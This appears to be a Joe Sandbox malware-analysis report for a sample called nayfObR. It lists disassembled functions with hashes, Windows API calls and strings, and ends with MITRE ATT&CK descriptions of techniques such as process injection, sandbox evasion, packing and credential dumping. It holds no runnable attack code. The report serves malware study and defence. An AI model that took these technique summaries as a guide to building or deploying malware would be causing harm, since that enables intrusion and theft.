Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 1ae9e2d881c2c71d952302a08626541b2469de7abe791097e998029e62844de9
Instruction ID: 19909638df5bacdd87bfd92a1b904fb5cefa65cebdded93b9b2c8c89a8336d08
Opcode Fuzzy Hash: 1ae9e2d881c2c71d952302a08626541b2469de7abe791097e998029e62844de9
Instruction Fuzzy Hash: CD01B175A05A1A9FDB06EF60EC49A7D7FA1BFDA340B14001EE80257391CF386E46DB81

Function 005BF251 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,005BF2ED,00000000,?,005D1ED0,?,?,?,005BF224,00000004,InitializeCriticalSectionEx,005C90D4,005C90DC), ref: 005BF25E
GetLastError.KERNEL32(?,005BF2ED,00000000,?,005D1ED0,?,?,?,005BF224,00000004,InitializeCriticalSectionEx,005C90D4,005C90DC,00000000,?,005B4C9C), ref: 005BF268
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 005BF290

Strings

api-ms-, xrefs: 005BF275

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 78bc0497cf623c2ef2916c8491c6299db257815e604c9ff56c1ee41d4f247a77
Instruction ID: 4cb60ccfc0c4206c5d74b5e08031481fa8e3ce6896aba3cd2b2f6d181333a833
Opcode Fuzzy Hash: 78bc0497cf623c2ef2916c8491c6299db257815e604c9ff56c1ee41d4f247a77
Instruction Fuzzy Hash: 2CE04F34280304BBEB301F60EC0BFAC7F58BB60B91F544430FA0CA90E0E7B1B814AA85

Function 005BD04E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(9BCBA9B0,00000000,00000000,?), ref: 005BD0B1

Part of subcall function 005B5101: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005B68D5,?,00000000,-00000008), ref: 005B5162

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005BD303
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 005BD349
GetLastError.KERNEL32 ref: 005BD3EC

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 965ac0a1d4d9b5de1a677704761af0a9927ddc988c42a68714ed6cdb6b2c34a4
Instruction ID: 6f0a049e598934cdccdcfeec40daf523deebd09f0635a9f67d3bc7be0cd4912c
Opcode Fuzzy Hash: 965ac0a1d4d9b5de1a677704761af0a9927ddc988c42a68714ed6cdb6b2c34a4
Instruction Fuzzy Hash: 2DD16975E046499FCF15CFA8C884AEDBFF5FF48310F28452AE416EB252E630A941CB61

Function 005B4373 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 005B443A
___AdjustPointer.LIBCMT ref: 005B445D
___AdjustPointer.LIBCMT ref: 005B44F9

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: a6c7bc0d999896993073c33eb2cbf37700c5553b0d560c63890354b25c0e7ac2
Instruction ID: ea44ee666e4dfcb81baf8173906719847365aa8fb5058da2c2bd3665801b4710
Opcode Fuzzy Hash: a6c7bc0d999896993073c33eb2cbf37700c5553b0d560c63890354b25c0e7ac2
Instruction Fuzzy Hash: A551B972A01606AFDF388F54D885BFA7BA5FF44310F144929E90587292E771FDA0DB90

Function 005BAE76 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 005B5101: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005B68D5,?,00000000,-00000008), ref: 005B5162

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 005BAEDA
__dosmaperr.LIBCMT ref: 005BAEE1
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 005BAF1B
__dosmaperr.LIBCMT ref: 005BAF22

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 1db3b4df4d2f835ef2055b514cfc6625e67a48401175a3cc92b90c376f3038d9
Instruction ID: 191e3b95dd30d4b94449fed994ceeee5f57289c85f98449fce7690205eb8f1a7
Opcode Fuzzy Hash: 1db3b4df4d2f835ef2055b514cfc6625e67a48401175a3cc92b90c376f3038d9
Instruction Fuzzy Hash: 6221A4B1604606AF9F20AF65C8859FFBFADFF443647148919F81997150E731FC408BA2

Function 005AC5E2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bcd68e95eb0f2bf8bda64b17ab4640afa58feddb2e8d9a02e3a34914f1170fa
Instruction ID: 0116646335df5dc7446332c8dc8e8c1250dc3455765d9ae181471b5226d216ae
Opcode Fuzzy Hash: 3bcd68e95eb0f2bf8bda64b17ab4640afa58feddb2e8d9a02e3a34914f1170fa
Instruction Fuzzy Hash: D121AE71600206AF8B20EF69DC8596F7FA8FF863647145915F81ADB250E730EC00D7A1

Function 005BC26E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 005BC276

Part of subcall function 005B5101: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005B68D5,?,00000000,-00000008), ref: 005B5162

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005BC2AE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005BC2CE

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 50f52d50433fbaf765d8b497613f39b9c132f23efeb0a5a22f3c4ac4ceb42a42
Instruction ID: 3ec3453320580e22cbab0585defc2a7b8769cd8b6f4b9ba38e236f6c732aff87
Opcode Fuzzy Hash: 50f52d50433fbaf765d8b497613f39b9c132f23efeb0a5a22f3c4ac4ceb42a42
Instruction Fuzzy Hash: D911A1B660291A7F6B2227B55D8EDFFAD9CFEE93943500814F841D2201FA24BD0095B5

Function 005C4090 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,005C357F,00000000,00000001,?,?,?,005BD440,?,00000000,00000000), ref: 005C40A7
GetLastError.KERNEL32(?,005C357F,00000000,00000001,?,?,?,005BD440,?,00000000,00000000,?,?,?,005BCD86,?), ref: 005C40B3

Part of subcall function 005C4110: CloseHandle.KERNEL32(FFFFFFFE,005C40C3,?,005C357F,00000000,00000001,?,?,?,005BD440,?,00000000,00000000,?,?), ref: 005C4120

___initconout.LIBCMT ref: 005C40C3

Part of subcall function 005C40E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,005C4081,005C356C,?,?,005BD440,?,00000000,00000000,?), ref: 005C40F8

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,005C357F,00000000,00000001,?,?,?,005BD440,?,00000000,00000000,?), ref: 005C40D8

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: c18dc54998e9a26aece28aceeca2b8fc4301fe07e58c09fee524819261ce6a7b
Instruction ID: d2a7fcb6c166b09d01889a39e595b58c6f93fbd177d42380ce6a8c9467026c66
Opcode Fuzzy Hash: c18dc54998e9a26aece28aceeca2b8fc4301fe07e58c09fee524819261ce6a7b
Instruction Fuzzy Hash: 35F0303A441525BFCF221FD2EC0DE893F26FB583A0B048815FA59A5130C6328820FF94

Function 005B9A26 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,005AF3D9,?,?,?,00000055,?,-00000050,?,?,?), ref: 005B9AE5
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,005AF3D9,?,?,?,00000055,?,-00000050,?,?), ref: 005B9B1C

Strings

utf8, xrefs: 005B9BEE

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: 310867bf0832a303438d830a766feb7899954e8620f92b64f2680636cdfd8664
Instruction ID: de9438966a36921f33c1eefab142351ba28290f624121ca2c5c5d71264b685b6
Opcode Fuzzy Hash: 310867bf0832a303438d830a766feb7899954e8620f92b64f2680636cdfd8664
Instruction Fuzzy Hash: FF51D371604716AAEB25AB748C46FF67FA8FF84700F244829F7459B181FA70FC80C6A5

Function 005B4A70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,005B4971,?,?,00000000,00000000,00000000,?), ref: 005B4A95

Strings

MOC, xrefs: 005B4AA7
RCC, xrefs: 005B4AAF

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: f6e792b274fd5887b350c8d074dc951769b6944f85051ad9d33c75df3c678a44
Instruction ID: a05a4541dd35b61673386abcde6809edf13dd317e7c591691a7cba43009d44d4
Opcode Fuzzy Hash: f6e792b274fd5887b350c8d074dc951769b6944f85051ad9d33c75df3c678a44
Instruction Fuzzy Hash: AE411771900209AFCF25DF98C985AEEBBB5FF48304F148159FA0466262D335EA60DF51

Function 005B42DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 005B4553

Strings

csm, xrefs: 005B4575
csm, xrefs: 005B45E6

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 53dacdfd04feabf8fe1187762ce52cf6a95ca14376bc500178c1e86366b4c014
Instruction ID: 12bb32774ecd432621c773dacad8ecc13bb024b10c0bf126fb6749a857e2e27c
Opcode Fuzzy Hash: 53dacdfd04feabf8fe1187762ce52cf6a95ca14376bc500178c1e86366b4c014
Instruction Fuzzy Hash: 9031AD72800219ABCF368F54CC459EE7F6AFF5A315B18865AF8544A163C332ECA1DF81

Function 005A2DC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 005A2DEE
std::_Lockit::~_Lockit.LIBCPMT ref: 005A2E19

Strings

G&Z, xrefs: 005A2E26

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: G&Z
API String ID: 593203224-3270801817
Opcode ID: c2e2110dc09828770d75c462e6e51b32c196efe937e006f524467acf39743530
Instruction ID: f40a7de95db70a668f2a3a13f93a391491367275e9b0012da1ff672204f73262
Opcode Fuzzy Hash: c2e2110dc09828770d75c462e6e51b32c196efe937e006f524467acf39743530
Instruction Fuzzy Hash: BC01E4B0E00209DFCB04EFA8D845AADBBF0FF59300F4004AAE806AB351EB346A54DF55

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

